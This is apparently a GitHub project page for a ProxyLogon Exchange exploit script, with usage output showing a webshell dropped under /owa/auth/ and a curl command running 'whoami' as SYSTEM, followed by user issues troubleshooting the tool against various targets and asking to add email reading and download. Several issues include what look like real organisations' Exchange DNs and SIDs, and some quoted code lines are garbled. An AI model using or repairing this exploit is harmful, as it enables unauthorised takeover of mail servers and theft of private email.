ProxyLogon Pre-Auth SSRF To Arbitrary File Write

Overview

For Education and Research

Usage:

C:\>python proxylogon.py mail.evil.corp [email protected]
Attacking target mail.evil.corp
=============================
Got DN: /o=EVIL CORP/ou=first administrative group/cn=Recipients/cn=Administrator
Got SID: S-1-5-21-175943541-xxxxxxxxxx-3152120021-500
Got session id: a99eda32-xxxx-xxxx-825b-5f1c4a6080e7
Got canary: rOWUk7lmAUC2-5HIlQ4EpGq1rPu959xxxxxxxxxx_xxxxxxx_xxx_a-KJ5WR-9j95yu-JOv3dFY.
=========== It means good to go!!!====
Got OAB id: 2f3d4600-xxxx-xxxx-xxxx-b4a4c1d3fb58
Successful!
(+) Webshell drop at https://mail.evil.corp/owa/auth/evilcorp.aspx
(+) Enjoy your shell: curl -ik https://mail.evil.corp/owa/auth/evilcorp.aspx -d 'exec_code=Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").stdout.readall())
CMD: whoami
nt authority\system
Comments
  • IndexError: list index out of range

    msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[1].split(";")[0]
    IndexError: list index out of range

    Does it mean the target is not vuln? Or is it my fault?

    opened by saeidshirazi 13
  • TypeError: a bytes-like object is required, not 'str'

    Traceback (most recent call last):
      File "C:\Users\m\Desktop\logs\New folder (2)000\Proxylogon-main\Proxylogon-main\proxylogon.py", line 75, in
        if "" not in ct.content:
    TypeError: a bytes-like object is required, not 'str'

    opened by MElbeshti 5
  • commands not executing

    Why is it possible to execute the first time and get a shell and receive responses from commands? The shell exists, because there is no 404 when you browse to it, but no commands execute or no results from command execution are returned?

    opened by donjuanme 2
  • rbacRole not found

    Got DN: /o=World Travel Centre/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=b80cd5b02dad4e0ebf16849183dc4c63-Admi
    Got SID: S-1-5-21-2867433882-3978468204-2437582583-500
    Got session id: ba6e26b3-7120-4304-9950-becbd76c41f0
    Got canary: 5Ip_ftGCY0utXt3RmuTR94N4jDAc6dgINADzDVSNY2XHZRQoH5Yal_ukueMSQVWRGqn1PQNuMhM.
    Wrong canary! Sometime we can skip this ...
    Traceback (most recent call last):
      File "c:\Users\undercover\Desktop\PX\Proxylogon-main\proxylogon.py", line 119, in
        rbacRole = ct.text.split("RBAC roles: ")[1].split("")[0]
    IndexError: list index out of range

    ============================

    How can I fix this? Tested on some targets; all of them have this issue.

    Tested on Win10, Python 3.9.

    opened by saeidshirazi 2
  • GetOAB Error!

    Got DN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=ab24791970e14c0dbb35163b29e8e456-admin
    Got SID: S-1-5-21-3765238651-1946275754-3596023858-500
    Got session id: c31306a9-aa11-4d3d-8be9-842e3fad4cc7
    Got canary: zVii2pyG8kO0KCxGS8M7noulX4-v79gIagXzNJWTeU5qDbTZSj-XrxxiQcxExTSjeV6VwDJfvPE.
    =========== It means good to go!!!====
    GetOAB Error!

    Any idea what the issue may be here?

    opened by donjuanme 1
  • email view and download

    Any chance of you adding the feature of mail view or download for a valid user?

    As I understand it, with the ProxyLogon bug you can view emails and download emails of a valid email without knowing the password of that email.

    opened by donjuanme 1
  • This error has been fixed

    File "proxylogon.py", line 98
        if ct.status_code != 241 or not "msExchEcpCanary" in ct.headers["Set-Cookie"]::
    SyntaxError: invalid syntax

    opened by MrCakeGuy 1
  • Access Denied

    Hello, when I checked the server its condition seems vulnerable, but when I try to read messages from email it says Access Denied. What can I do as a remedy? Thx

    opened by HJ23 1
  • File "proxylogon.py", line 65, in

    Hey, can you help me please? What am I doing wrong?

    Attacking target ex01.test.local

    Got DN: /o=test/ou=Exchange Administrative Group (FYDIBOHF9546LRG)/cn=Recipients/cn=user5e1sdf71
    Traceback (most recent call last):
      File "proxylogon.py", line 65, in
        mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
    UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 5: ordinal not in range(128)

    opened by 13Ragna37 0
Owner
lulz